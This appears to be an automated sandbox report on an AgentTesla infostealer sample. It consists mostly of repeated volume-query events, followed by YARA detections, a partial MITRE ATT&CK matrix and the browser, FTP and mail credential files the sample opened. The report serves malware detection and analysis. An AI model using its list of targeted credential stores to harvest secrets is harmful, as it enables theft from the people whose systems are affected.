                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\srt.exeQueries volume information: C:\Users\user\AppData\Roaming\srt.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\srt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeQueries volume information: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\srt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000C.00000002.2199429971.0000000004283000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2223798583.0000000004123000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2249091795.0000000004273000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 31.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.41c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.srt.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4183840.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4123840.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4123840.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4283840.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4183840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.svchost.exe.4273840.10.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000018.00000002.2354156533.0000000002511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2199429971.0000000004283000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2354462917.00000000025FB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2223798583.0000000004123000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2249091795.0000000004273000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2356782118.0000000002899000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2352010780.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: srt.exe PID: 1696, type: MEMORY
                      Source: Yara matchFile source: 31.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.41c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.srt.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4183840.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4123840.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4123840.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4283840.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4183840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.svchost.exe.4273840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4283840.9.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2004
                      Source: Yara matchFile source: 00000018.00000002.2354156533.0000000002511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2356782118.0000000002899000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000C.00000002.2199429971.0000000004283000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2223798583.0000000004123000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2249091795.0000000004273000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 31.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.41c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.srt.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4183840.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4123840.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4123840.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4283840.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4183840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.svchost.exe.4273840.10.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000018.00000002.2354156533.0000000002511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2199429971.0000000004283000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2354462917.00000000025FB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2223798583.0000000004123000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2249091795.0000000004273000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2356782118.0000000002899000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2352010780.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: srt.exe PID: 1696, type: MEMORY
                      Source: Yara matchFile source: 31.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.41c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.srt.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4183840.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4123840.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4123840.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4283840.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4183840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.svchost.exe.4273840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4283840.9.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Startup Items1Startup Items1Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery12Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder321Access Token Manipulation1Obfuscated Files or Information1Input Capture11System Information Discovery115Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
